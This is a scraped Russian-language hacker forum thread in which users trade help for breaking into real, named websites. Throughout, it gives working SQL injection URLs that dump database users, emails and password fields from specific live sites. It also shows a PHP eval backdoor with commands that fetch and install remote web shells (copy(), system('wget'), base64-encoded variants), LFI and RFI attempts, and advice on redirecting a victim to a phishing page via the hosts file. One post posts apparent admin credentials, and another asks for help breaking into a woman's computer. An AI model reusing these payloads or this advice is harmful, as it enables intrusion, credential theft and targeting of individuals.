z0mbyak said:
кстати configuration.php доступен для записи?


недоступен

кста, помогите добиться ошибки тут http://sfokr.ru

нужен путь

Есть у меня данные wp-settings.php

define('DB_NAME', 'name');

/** MySQL database username */

define('DB_USER', 'username');

/** MySQL database password */

define('DB_PASSWORD', 'pass');

/** MySQL hostname */

define('DB_HOST', 'localhost');

каким образом можно подключится, если например я не нашел путь к phpmyadmin

I love this game said:
Есть у меня данные wp-settings.php
define('DB_NAME', 'name');
/** MySQL database username */
define('DB_USER', 'username');
/** MySQL database password */
define('DB_PASSWORD', 'pass');
/** MySQL hostname */
define('DB_HOST', '
localhost
');
каким образом можно подключится, если например я не нашел путь к phpmyadmin


никак..ну или с сайта на том же хосте...имею в виду шелл или пыху

Warning: move_uploaded_file(/pub/home/xxx/htdocs/images/shell.php) [function.move-uploaded-file]: failed to open stream: No such file or directory in d:\xxx\http\admin.php on line 1434
Warning: move_uploaded_file() [function.move-uploaded-file]: Unable to move 'd:\web\temp\php5E1D.tmp' to '/pub/home/xxx/htdocs/images/shell.php' in d:\xxx\http\admin.php on line 1434


что значит? как обойти?

noviyuser said:
что значит? как обойти?



В скрипте неверный путь указан. Скорей всего сайт был на *nix хостинге, а потом его перенесли на винду.

Обойти можно только если:

1. в админке можно редактировать путь заливки файлов. Шансы стремятся к нулю

2. если путь определяется переменной, то узнать ее и попытаться передать ее в POST\GET\COOKIE запросе(при register globals on ). Шансы минимальны.

3. попробовать изменить запрос так, чтоб файл вышел на несколько папок ниже. Более вероятно.

Возможно ли обойти данную конструкцию?

$get=preg_replace("/[^0-9a-zA-Z]/","",$_GET['id']);

добрый день подскажыте пожалуйста как залить шелл через скулю

http://encycl.anthropology.ru/article.php?id=999999+union+select+1,2,3,4,5,6,7,8 ,9,10

qaz said:
добрый день подскажыте пожалуйста как залить шелл через скулю
http://encycl.anthropology.ru/article.php?id=999999+union+select+1,2,3,4,5,6,7,8 ,9,10


Нельзя, кавычки (') фильтруются, читай SQL Injection Полный FAQ (https://antichat.live/threads/43966/)

Moriarty said:
Кроме как через "установка модулей", как в джумлу залиться? (ver. 1.5.9)


Я через картинку заливал.

Вопрос:

Можно ли как нибудь сделать чтобы жертва заходя на адрес

www.sait.ru/admin попадала на фэйк к примеру salt.ru/admin , Либо в www.sait.ru/admin открывался фрэйм фэйка, Доступ к компу жертвы есть но неполноценный.

портал xss-уязвим, но не факт что в момент доступа к компу сохраниться куки.

SMerCH47 said:
Вопрос:
Можно ли как нибудь сделать чтобы жертва заходя на адрес
www.sait.ru/admin попадала на фэйк к примеру salt.ru/admin , Либо в www.sait.ru/admin открывался фрэйм фэйка, Доступ к компу жертвы есть но неполноценный.
портал xss-уязвим, но не факт что в момент доступа к компу сохраниться куки.


Насколько доступ "неполный"?

Если можешь заливать/править файлы, подними фейк на дедике с белым IP и кинь жертве в хостс соответствующую запись, после ребута он попадет на фейк при заходе.

Лучше всего протесть все у себя для начала.


Moriarty said:
Кроме как через "установка модулей", как в джумлу залиться? (ver. 1.5.9)


Любой другой инсталлер (модули, мамботы и т.д.), шаблоны, менеджер языков.

Если все не канает, пробуй залиться через какой-либо из установленных компонентов, если есть аплоад, пробуй заливаться всюду, где он есть.

fl00der said:
Насколько доступ "неполный"?
Если можешь заливать/править файлы, подними фейк на дедике с белым IP и кинь жертве в хостс соответствующую запись, после ребута он попадет на фейк при заходе.
Лучше всего протесть все у себя для начала.


Доступ у стороннего человека, может вставить флэшку не на долгое время.. если бы я был уверен что в куки храниться то все можно было бы решить по средствам xss и соц. инженерии..

"подними фейк на дедике с белым IP и кинь жертве в хостс" - расшифруй это..я не хацкер, я простой юзер -)

Еще есть мысль Батником отредактировать закладки если сайт в них есть

Moriarty said:
Да там видио косяк с путями! Я уже встречал такое на пхпбб...как только заливка чего либо завершается - выводится ошибка о неправильных путях... =\



Помогите разобраться с синтаксисом. Сервер под FreeBSD, как правильно составить команду, чтобы залить шелл?

rcp -p /usr/local/www/httpdocs/shell.php http://site.ru/shell.php

FlaktW said:
Помогите разобраться с синтаксисом. Сервер под FreeBSD, как правильно составить команду, чтобы залить шелл?
rcp -p /usr/local/www/httpdocs/shell.php http://site.ru/shell.php



wget, get, curl,fetch,lynx

Gorev said:
wget, get, curl,fetch,lynx


Это FreeBSD и установлены:

/usr/bin/fetch

/bin/rcp

/bin/cp

/usr/bin/scp

Помогите вывести БД.

http://skazka.nsk.ru/trick.29/id,40'/

При заходе на шелл пустая страница. Как быть? .htaccess нет возможности переписать.

Lijzer said:
При заходе на шелл пустая страница. Как быть? .htaccess нет возможности переписать.


1. Может быть антивирус, попробуй другой шелл.

2. Может быть нет интерпритации php\или она отключена => попробуй perl\python шелл.

Попробуй . Если не выводит, то проблема в PHP.

Tigger said:
1. Может быть антивирус, попробуй другой шелл.
2. Может быть нет интерпритации php\или она отключена => попробуй perl\python шелл.
Попробуй . Если не выводит, то проблема в PHP.


На перле залил шелл акцесс денайд.

>>> выводит

>>> не выводит

Как же обойти?

Lijzer

смотря конечно же что конкретно фильтруется

Lijzer said:
На перле залил шелл акцесс денайд.
>>> выводит
>>> не выводит
Как же обойти?



попробуй незакодированный шелл..

Делаю так





http://localhost/x.php?b=phpinfo(); показывает

http://localhost/x.php?b=ls не показывает

allow_url_fopen On

magic_quotes_gpc On

Но при http://localhost/x.php?b=eval(file_get_contents('http://blalba/shell.txt'));

пустой экран.

Попробывал

http://localhost/x.php?e=http://blabla/shell.txt

пустой экран.

Уже заканчивается фантазия ... Может есть еще идеи?

b=phpinfo();

b=ls

чот не понял, что за универсальная функция у тебя там?

покажи код бекдора

if (isset($_REQUEST['b'])) eval(stripslashes($_REQUEST['b']));

по поводу ls погорячился, точнее курю мануалы и понимаю что сглупил... а если еще точнее не обьявил системную ...

Lijzer said:
if (isset($_REQUEST['b'])) eval(stripslashes($_REQUEST['b']));

по поводу ls погорячился, точнее курю мануалы и понимаю что сглупил... а если еще точнее не обьявил системную ...


b=copy('http://site.com/shell.txt','shell.php');

b=eval(base64_decode('Y29weSgnaHR0cDovL3NpdGUuY29t L3NoZWxsLnR4dCcsJ3NoZWxsLnBocCcpOw=='));

-----------

b=system('wget http://site.com/shell.php');

b=eval(base64_decode('c3lzdGVtKCd3Z2V0IGh0dHA6Ly9z aXRlLmNvbS9zaGVsbC5waHAnKTs='));

вариантов много, если хотите залить шелл пробуйте эти для примера, смените урл на нормальный линк к шеллу

Помогите раскрутить

http://www.lazyjack.co.jp/cp-bin/webstore/catalog/product_info.php/products_id/1647'

pls

Flashmx said:
Помогите раскрутить
http://www.lazyjack.co.jp/cp-bin/webstore/catalog/product_info.php/products_id/1647'
pls


http://www.lazyjack.co.jp/cp-bin/webstore/catalog/product_info.php/products_id/1647' or 1 group by concat(version(),floor(rand(0)*2)) having max(0) or 1-- 1

http://meb[G00GLE]el-dvs.ru/main_p3.php?&d=mebelionika&nmr=2&nmr2=3&im=../../../../../../boot.ini%00&rzd=&nmstr=495&sn=&content=%CC%E5%E1%E5%EB%FC%ED%E0%FF%20%F4%E0%E1%F0 %E8%EA%E0%20%CC%E5%E1%E5%EB%E8%EE%ED%E8%EA%E0&content2=catalog_mebelionika

Что-то можно вообще сделать? Забавный сайт какой-то.

fl00der said:
http://meb[
G00GLE
]el-dvs.ru/main_p3.php?&d=mebelionika&nmr=2&nmr2=3&im=../../../../../../boot.ini%00&rzd=&nmstr=495&sn=&content=%CC%E5%E1%E5%EB%FC%ED%E0%FF%20%F4%E0%E1%F0 %E8%EA%E0%20%CC%E5%E1%E5%EB%E8%EE%ED%E8%EA%E0&content2=catalog_mebelionika
Что-то можно вообще сделать? Забавный сайт какой-то.


Тут LFI

достаточно и этого


http://mebel=dvs.ru/main_p3.php?&d=


Но ты там не найдешь boot.ini, потому что этот сайт не на диске C(загрузочном) находится, по-ходу можно читать файлы на диске D, но вряд ли там есть что-то полезное

eclipse said:
Тут LFI
достаточно и этого
Но ты там не найдешь boot.ini, потому что этот сайт не на диске C(загрузочном) находится, по-ходу можно читать файлы на диске D, но вряд ли там есть что-то полезное


Там Open_basedir ограничивает, там даже пути даны, так что в топку походу.

Знаю ip жертвы, открытые порты 21 / tcp ftp, 22 / tcp ssh, 23 / tcp telnet, 80 / tcp http, 1863 / tcp - msnp, 1864 / tcp - paradym-31port, 5190 - про этот порт не знаю.

есть доступ к почте жертвы.

конекчусь с помощью putty через ssh или telnet port и получаю epic fail

возможно у жертвы стоит галочка в удаленном помощнике - проверил что-то не получается зайти.

Цель проникнуть на комп, получить доступ, опыта нет подскажите идеи что можно придумать.

Pbz said:
Знаю ip жертвы, открытые порты 21 / tcp ftp, 22 / tcp ssh, 23 / tcp telnet, 80 / tcp http, 1863 / tcp - msnp, 1864 / tcp - paradym-31port, 5190 - про этот порт не знаю.
есть доступ к почте жертвы.
конекчусь с помощью putty через ssh или telnet port и получаю epic fail
возможно у жертвы стоит галочка в удаленном помощнике - проверил что-то не получается зайти.
Цель проникнуть на комп, получить доступ, опыта нет подскажите идеи что можно придумать.


Фаервол может делать "epic fail".

Так же у жертвы может быть динамический IP. И вообще странное что у юзера открыты эти порты, может это роутер? =\

Tigger said:
Фаервол может делать "epic fail".
Так же у жертвы может быть динамический IP. И вообще странное что у юзера открыты эти порты, может это роутер? =\


Да роутер вроде есть, кстати по ssh сразу кричит epic fail, а вот через telnet вроде заходит, в настройках не указывал под каким именем зайти, но тоже тишина, не вижу строчки ввести логин бла бла бла.

Может через почтовый ящик что-то замутить можно? доступ есть, проблема вся в том какое письмецо прислать и что стырить, чтобы получить доступ.

p.s. жертва - девушка.

id=1'+group+by+DocSrc,name_doc+having+'1'='1'--

выдает


Microsoft SQL Native Client error '80040e14'
The text, ntext, and image data types cannot be compared or sorted, except when using IS NULL or LIKE operator.


id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATI ON_SCHEMA.TABLES)--


Microsoft SQL Native Client error '80040e14'
Incorrect syntax near the keyword 'IN'.


Посоветуйте пожалуйсто решение

Вопрос насчет xss

Есть сайт на нем уязвим модуль search

Используется уязвимость вот такая (http://securityvulns.ru/Xdocument418.html)

Когда сниффаю получаю лог такого вида


Code:
cnd__lastvisit=1302335876; cnd__lastactivity=0; IDstack=,56445,; vbseo_loggedin=yes; __utma=89779204.1220064702.1302335873.1302335873.1 302335873.1; __utmb=89779204.2.10.1302335873; __utmc=89779204; __utmz=89779204.1302335873.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); nugg_frequencyCapping=2

Как я выяснил ultm* это Google аналитик

А сама сессия храниться в cnd__sessionhash

И она не приходит

Что можно сделать в этом случае

White Bear said:
Вопрос насчет xss
Есть сайт на нем уязвим модуль search
Используется уязвимость вот
такая (http://securityvulns.ru/Xdocument418.html)
Когда сниффаю получаю лог такого вида

Code:
cnd__lastvisit=1302335876; cnd__lastactivity=0; IDstack=,56445,; vbseo_loggedin=yes; __utma=89779204.1220064702.1302335873.1302335873.1 302335873.1; __utmb=89779204.2.10.1302335873; __utmc=89779204; __utmz=89779204.1302335873.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); nugg_frequencyCapping=2

Как я выяснил ultm* это Google аналитик
А сама сессия храниться в cnd__sessionhash
И она не приходит
Что можно сделать в этом случае



Куки имеют флаг HTTPOnly, наверное

Pbz said:
Да роутер вроде есть, кстати по ssh сразу кричит epic fail, а вот через telnet вроде заходит, в настройках не указывал под каким именем зайти, но тоже тишина, не вижу строчки ввести логин бла бла бла.
Может через почтовый ящик что-то замутить можно? доступ есть, проблема вся в том какое письмецо прислать и что стырить, чтобы получить доступ.
p.s. жертва - девушка.


помогите пожалуйста

попугай said:
Куки имеют флаг HTTPOnly, наверное


И как нибудь возможно обойти их?

Есть php-скрипт. У него вверху задаётся:


PHP:
$setup['param_login']='login';

$setup['param_pw']='pass';



и в теле используются заданные выше данные:


PHP:
functionAddLinkPost() {

global$setup;

$pw=GetParametr('pw','post');

$login=GetParametr('login','post');

$linkdata=GoodVal(GetParametr('linkdata','post'));

if( ($login!=$setup['param_login']) or ($pw!=$setup['param_pw']) ){

echo'strbeg'.'errorlogin'.'strend';

exit;

}

// Далее пошёл код



Вот меня интересует можно как-то обойти проверку соответствия логина и пароля?

Выкладываю полную версию скрипта:


PHP:




По не подтверждённым данным этот скрипт уже был взломан, вот только как?

Moriarty said:
Только если подобрали эти значения. Запросов в бд вообще никаких нет?! Просто функция GetParametr нихрена ничего не фильтрует!


подбирать их? всмысле наугад?

запросов в БД никаких, работа только с текстовыми файлами.

другие варанты?

Moriarty said:
Глукануло апач, и он дал скачать этот файл =)
Не парься, все норм со скриптом.


мне через него фейк пайпала залили на сайт...!

Всем привет... подскажите, где в mssql хранятся пароли пользователя sa? и какой у них тип... ну и как шифруется?

Спасибо!

Есть занятная RFI в жумле. Пытаюсь поюзать:

mosConfig_absolute_path=http://****.ru/sh.txt?


Code:
Restricted access

Moriarty said:
mosConfig_
absolute
_path !!!
allow_url_fopen =
OFF


Чего-то не понял на счет первого. allow_url_fopen включенный\выключенный=не работает.

Ups said:
Есть занятная RFI в жумле. Пытаюсь поюзать:
mosConfig_absolute_path=http://****.ru/sh.txt?

Code:
Restricted access



Закрыта бага значит :facepalm:

Expl0ited said:
Закрыта бага значит :facepalm:


Дык, старая версия плагина и с багой.

Ups said:
Дык, старая версия плагина и с багой.


Ну вот скажи мне, какая разница между версиями плагина?

Джумла устроена так, что сторонние компоненты лотаются довольно просто, добавлением строчки в начало бажного скрипта:


PHP:

Expl0ited said:
лотаются довольно просто, добавлением строчки в начало бажного скрипта:

PHP:






Удалил строчку. Терь ошибки вылетают.

Имеется жертва с http://localhost/news.php?do=news&page=2&, Все что следует после 2 обрубается, при подстановке page не int значения или просто пустое выражение вылетает File: /var/www/localhost/news.php

Line: 33

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-15,15' at line 1

Я так понимаю кроме расрытие путей это ничего не дает?

Lijzer said:
Имеется жертва с http://localhost/news.php?do=news&page=2&, Все что следует после 2 обрубается, при подстановке page не int значения или просто пустое выражение вылетает File: /var/www/localhost/news.php
Line: 33
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-15,15' at line 1
Я так понимаю кроме расрытие путей это ничего не дает?


Да, GET-параметро обрабатываеться intval'ом и ничего кроме цифр не пускает. А из-за того, что параметр остается пустой, то SQL-запрос становиться невалидный и вылетает ошибка.

vbseo lfi. если в аватарку дописать шелл, и проинклюдить подключает как картинку. ava%00.php пишит ошибку, точнее не срабатывает нулл байт, пробывал заменить слешами тоже самое. Выше директории форума не выйти. Какие есть варианты.?*

Вот такая ситуация скуля в пост запросе делаю так

select state from zip where zipcode = '23243'+ORDER+BY+1;--+';

ошибка

select state from zip where zipcode = '23243'+ORDER+BY+1000;--+';

тоже ошибка

Пробую без кавычек

+ORDER+BY+10000;--+

без ошибок выполняет не ответа ни привета, че делать?

желательно в пм , помогите уважаемые форумчане

satana8920 said:
Вот такая ситуация скуля в пост запросе делаю так
select state from zip where zipcode = '23243'+ORDER+BY+1;--+';
ошибка
select state from zip where zipcode = '23243'+ORDER+BY+1000;--+';
тоже ошибка
Пробую без кавычек
+ORDER+BY+10000;--+
без ошибок выполняет не ответа ни привета, че делать?
желательно в пм , помогите уважаемые форумчане


пробуй не плюс, а пробел

satana8920 said:
Вот такая ситуация скуля в пост запросе делаю так
select state from zip where zipcode = '23243'+ORDER+BY+1;--+';
ошибка
select state from zip where zipcode = '23243'+ORDER+BY+1000;--+';
тоже ошибка
Пробую без кавычек
+ORDER+BY+10000;--+
без ошибок выполняет не ответа ни привета, че делать?
желательно в пм , помогите уважаемые форумчане


В пост запросах нужно использовать пробел вместо знака плюс(+), т.к. знак плюс(+) именно в гет запросах обозначает пробел, т.е. запрос нужно отправить такой:


Code:
select state from zip where zipcode = '23243' ORDER BY 1000#

или же:


Code:
select state from zip where zipcode = '23243' ORDER BY 1000 AND '1'='1

помогите раскрутить


Code:
http://www.maine.gov/tools/whatsnew/index.php?topic=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35+--+

Домашнее задание на выходные для всех кулхацкеров из этого треда и вообще раздела уязвимости: открыть документацию по MySQL и прочитать про виды комментариев. Невозможно уже на это смотреть.

Redwood said:
Домашнее задание на выходные для всех кулхацкеров из этого треда и вообще раздела уязвимости: открыть документацию по MySQL и прочитать про виды комментариев. Невозможно уже на это смотреть.


А что там читать?

/* - полный

-- - строчный

# - строчный

Кто заливал шелл на MyBB 1.2.10 (имею права админа), поделитесь информацией плз.

mybb


cipa21 said:
Кто заливал шелл на MyBB 1.2.10 (имею права админа), поделитесь информацией плз.


/thread27777.html

http://www.securitylab.ru/vulnerability/379819.php

http://forum.xakepok.org/showthread.php?t=388

http://securityvulns.ru/docs26044.html

/showthread.php?t=149667

C завидной регулярностью попадаю на такую штуку. Не получается подобрать кол-во полей. Что не так?

Пример, вот. Ошибка не пропадает, хоть убейся.

http://www.oaontc.ru/node/243?SysNum=137159

ta-kyn said:
C завидной регулярностью попадаю на такую штуку.
Не получается подобрать кол-во полей. Что не так?
Пример, вот. Ошибка не пропадает, хоть убейся.
http://www.oaontc.ru/node/243?SysNum=137159


Глаза пошире сделай:


Code:
http://www.oaontc.ru/node/243?SysNum=(13715)and(1)=(2)union+select(version() ),2,3,4,5,6,7,8/*

ta-kyn said:
C завидной регулярностью попадаю на такую штуку.
Не получается подобрать кол-во полей. Что не так?
Пример, вот. Ошибка не пропадает, хоть убейся.
http://www.oaontc.ru/node/243?SysNum=137159


Потому что там двойной запрос. Надоели такие вопросы, появляются постоянно! Учите мат. часть.


Expl0ited said:
Глаза пошире сделай:

Code:
http://www.oaontc.ru/node/243?SysNum=(13715)and(1)=(2)union+select(version() ),2,3,4,5,6,7,8/*



Зачем же так, когда все делается намного проще:

http://www.oaontc.ru/node/243?SysNum=137159+and+1=2+union+select+1,version() ,3,4,5--+

4.1.25-log

http://www.oaontc.ru/node/243?SysNum=-13+union+select+1,version%28%29,3,4,5--

А так не проще? или я чегото не догоняю?

Похоже что это sql-inj

Но вот когда начинаю искать количество столбцов (order by) перекидывает на другую страницу. Как с таким быть?

http://www.cue.ru/catalog.php?pid=1'

Fooog said:
Похоже что это sql-inj
Но вот когда начинаю искать количество столбцов (order by) перекидывает на другую страницу. Как с таким быть?
http://www.cue.ru/catalog.php?pid=1'


pid=1)+order+by+1/*

upd:


HTML:
http://www.cue.ru/catalog.php?pid=1)+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)a+group+by+mid(c oncat_ws(0x3a,version(),user(),database()),floor(r and(0)*2),64))/*

4.1.15-Debian_1-log:qp_newcue@localhost:qp_newcue

genzome said:
http://www.oaontc.ru/node/243?SysNum=-13+union+select+1,version%28%29,3,4,5--
А так не проще? или я чегото не догоняю?


Раз такая пьянка, тогда можно и так:


Code:
http://www.oaontc.ru/node/243?SysNum=(0)union+select(version())--+

что можно придумать если запрос в котором есть точка обрезается после неё, те невозможно получить информацию к примеру из information_schema.tables получается information_schema все что после режется.

recfrf said:
что можно придумать если запрос в котором есть точка обрезается после неё


Таблицы брутить, колонки пробовать вывести через ошибки.

народ подскажите пожалуйста как дальше разкручивать подобный скуль

http://www.photoclub.com.ua/rubric/?id=34' union select 1 from rubric where 1='

http://www.photoclub.com.ua/rubric/?id=34'+or+(select+count(*)+from+(select+1+union+s elect+2+union+select+3)x+group+by+concat(version() ,floor(rand(0)*2)))--+'


SQL error: Duplicate entry '5.1.49-3-log1' for key 'group_key'

ухты, спасибо, а вот ещо вопрос,

столбцы подобраны правильно

http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat%28column_name%29,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+ from+information_schema.columns+where+table_name=0 x75736572--

а вот например вывести пароли из узер неполучается, почему?

http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,Password,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,18,19,20,21,22,23+from+user--

qaz

from mysql.user

Cennarios said:
Ведь error-based имеет свои нюансы и к примеру load_file провести через посредством этой методики нельзя


еще как можно

Есть сайт. Главная:

http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=1

Подскажите как можно нарыть уязвимости, на SQL Injection на ощупь не получаетс:

http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=1' -ошибки не выдает

http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=2-1 - выкидывает на другую страницу.

Если это фильтрация то каким способом можно ее обойти?

p.s. Извините за возможно глупый вопрос.

Konqi said:
qaz
from mysql.user


так тоже ничего не выводит

qaz said:
так тоже ничего не выводит


http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(user,0x3a,password), 3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,2 2+from+mysql.user--

qaz said:
так тоже ничего не выводит


Запрос:


HTML:
http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(concat_ws(0x2e,table _schema,table_name)),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,18,19,20,21,22,23+from+information_schema.ta bles+where+table_name+like+0x257573657225--+

Результат:


HTML:
nw.phpbb_users,nw_mir.users,trvlr_forum.phpbb3user s,trvlr_forum.phpbb_users,trvlr_top.users

Выбираешь нужную таблицу. Для примера trvlr_top.users

1) Узнаем колонки

Запрос:


HTML:
http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from +information_schema.columns+where+table_name=0x757 3657273+AND+table_schema=0x7472766C725F746F70--+

Результат:


HTML:
memberid,sitename,url,email,description,password,c licksin,clicksout,hits,date,passreset,passreset2,r ank,id_kat,hosts,knopka,mail,open,all,status,users ,ocenka,checker,login,chastota,fio,open_link,conte nt,title,server,desc,keyword,time,chk_date,chk_res ult,is_new,is_violator,days_left,mail_sent,chk_att empts

2) Выводим юзеров

Запросы:


HTML:
http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,membe rid,email,password)),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,18,19,20,21,22,23+from+trvlr_top.users+where +memberid+between+1+and+20--+



HTML:
http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,membe rid,email,password)),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,18,19,20,21,22,23+from+trvlr_top.users+where +memberid+between+21+and+40--+

и т.д.

cat1vo said:
SQL error: Duplicate entry '5.1.49-3-log1' for key 'group_key'


А можно поинтерисоватся,

http://www.photoclub.com.ua/rubric/?id=34'+or+(select+count(*)+from+(select+1+union+s elect+2+union+select+3)x+group+by+concat(version() ,floor(rand(0)*2)))--+'

я такой запрос вижу в первый раз, может мно хтото обьяснить што ето,

особенно интерисует

+or+(select+count(*)+from+(select+1+union+s elect+2+union+select+3)x

и

floor(rand(0)*2))

Nightmarе said:
Itemid=1 страница 1.
Itemid=2-1 страница 2.
логично кажется.... тут SQL нет. ибо тогда в любой новости при смене ID в параметре новость бы менялась, но это не значит что это SQL
Проверяем SQL так:
Itemid=1+or+1=1
Itemid=1+or+1=2
Так страницы должны меняться. не меняются, значит запрос обрамлён в кавычки, пробуем так:
Itemid=1'+or+1=1+--+1
Itemid=1'+or+1=2+--+1
Не меняются страницы, значит SQL нету.


Здесь есть Blind

http://cls.tgl.ru/index.php?no_html=1&option=com_rss&feed=RSS2.0

http://cls.tgl.ru/index.php?Itemid=106&option=com_content&task=blogsection&id=3

http://cls.tgl.ru/index.php?option=com_rss&feed=RSS0.91&no_html=1

qaz said:
я такой запрос вижу в первый раз, может мно хтото обьяснить што ето


/showpost.php?p=407227&postcount=3

Да что вы. Здесь нет SQL. Параметр обрабатывается функцией intval. Т е первые цифры сохраняються, а всё что идёт после них обрезаеться.

Пример:


Code:
http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=2'''')))) Пиши всё что угодно!

phpbb 3.0.0 MySQL 4.0.27 blind inj


Code:
ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A ,username,user_password),17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(109, 97, 114, 97, 116)/*-

Результат показывает.


Code:
?ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A ,username,user_password),17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(115, 99, 111, 114, 114, 121)/*-

Молчит. 2ой юзер в форуме есть. Из-за чего такое может быть и как это обойти?

guezd said:
phpbb 3.0.0 MySQL 4.0.27 blind inj

Code:
ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A ,username,user_password),17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(109, 97, 114, 97, 116)/*-

Результат показывает.

Code:
?ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A ,username,user_password),17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(115, 99, 111, 114, 114, 121)/*-

Молчит. 2ой юзер в форуме есть. Из-за чего такое может быть и как это обойти?


1. В один из- параметров подставь cout(*) и посмотри сколько возможно вывести записей при данном запросе.

2. Конвентируй в HEX, а не в CHAR.

3. Попробуй вывести без WHERE через LIMIT ИЛИ LIKE.

P.S. Не получиться, ссылку в ПМ.

guezd said:
phpbb 3.0.0 MySQL 4.0.27 blind inj


blind с выводом через union? как это?

M_script said:
blind с выводом через union? как это?


это ошибка новичка =)

vasykas said:
Здесь есть blind
http://cls.tgl.ru/index.php?no_html=1&option=com_rss&feed=RSS2.0
http://cls.tgl.ru/index.php?Itemid=106&option=com_content&task=blogsection&id=3
http://cls.tgl.ru/index.php?option=com_rss&feed=RSS0.91&no_html=1


Это что-то дает? Значит прокатят blind SQL Injection? Я правильно понял? Как можно это использовать?

Crouch said:
Это что-то дает? Значит прокатят blind SQL Injection? Я правильно понял? Как можно это использовать?


Нет моя прога ошиблась (см. топик выше от XAMEHA)

сам нашел

vasykas said:
Нет моя прога ошиблась (см. топик выше от
XAMEHA
)


Значит все дело в обработке intval?

В поле авторизации пишу hi' or 1=1-- на сайте http://*******.tv/login.php И выводит You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'hi' or 1=1--' LIMIT 1)' at line 4. Тоесть скуля Как такую крутить?)

а что непонятного?

MySQL server version for the right syntax to use near 'hi' or 1=1--' LIMIT 1)'

//для тех кому не понятно, то как бы закрыть надо её

Вопрос такого типа, как можно перехватить пороль(узнать) имея доступ на систему (root) FreeBSD 6.3, знаю есть хеш, но он не побираеться. уже 2 недели;( читал про затроянивания ssh, но он делает только доступ. Какие есть идет по перехвату пороля узера?

подскажите как сода залить шелл

http://ptb.ib-pan.krakow.pl/admin/index.php

ptb@obpan.pl

p162002b

плз

assinjeans said:
подскажите как сода залить шелл
http://ptb.ib-pan.krakow.pl/admin/index.php
ptb@obpan.pl
p162002b
плз


создай (где нить в новостях) html форму аплоада и пробуй через /admin/upLoad.php

или залей на http://ptb.ib-pan.krakow.pl/files/ .htaccess и пробуй другие расширение...

функция mysql_connect

Наверно наивный вопрос, но все же...

Скрипт принимает данные и сразу же передает их функции mysql_connect().

По результатам ее работы устанавливается флаг об успешной или неуспешной авторизации. Можно ли в эту функцию что-то такое пихнуть (хотя бы теоретически), чтобы mysql_connect() вернула true? В 2006 году был сплоит по переполнению буфера в этой функции, но тут он не подходит.

//спецтема

https://forum.antichat.net/threadnav91666-1-10.html

Возможно ли через PHPList шелл залить?

вот скуль: http://artwithaheart.us/pages.php?pid=-5+union+select+1,2,3,4,5,6,7,8,9,0,11,12

выводимые поля не могу оприделить, допустим если в каждое поле вставить version() то сайт отоброжается, если поставить в 4 поле то выдает ошибку, как я понимаю там тока числовые значения проходят, подскажите ка дабить эту скуль если можно через четвертую колонку, а еще лудше где мануал по такому роду уязвимости почитать можно...

вот скуль: http://artwithaheart.us/pages.php?pid=-5+union+select+1,2,3,4,5,6,7,8,9,0,11,12
выводимые поля не могу оприделить


Раскрутил как BLIND!

database(): awah

@@tmpdir: /tmp

version(): 5.1.53-log

@@version_compile_os: pc-linux-gnu

user(): awah@lapstop.com.br

@@basedir: /data/mysql/zehnder/

@@datadir: /dh/mysql/ze_nder/data/

winstrool said:
вот скуль: http://artwithaheart.us/pages.php?pid=-5+union+select+1,2,3,4,5,6,7,8,9,0,11,12
выводимые поля не могу оприделить, допустим если в каждое поле вставить version() то сайт отоброжается, если поставить в 4 поле то выдает ошибку, как я понимаю там тока числовые значения проходят, подскажите ка дабить эту скуль если можно через четвертую колонку, а еще лудше где мануал по такому роду уязвимости почитать можно...




Code:
http://artwithaheart.us/pages.php?pid=5%20and%201=2+union+select+1,2,3,%28 0x3120616e6420313d3220756e696f6e2073656c6563742031 2c322c332c76657273696f6e2829202d2d2031%29,5,6,7,8, 9,10,11,12

P.S. ну тебя же должно было смутить, что если ты пишешь в 4ое поле не число и тебе выдаёт ошибку mysql_fetch_array() то значит что этот параметр используется где-то ещё (для общего развития)

Не пойму как тут дальше выводить:


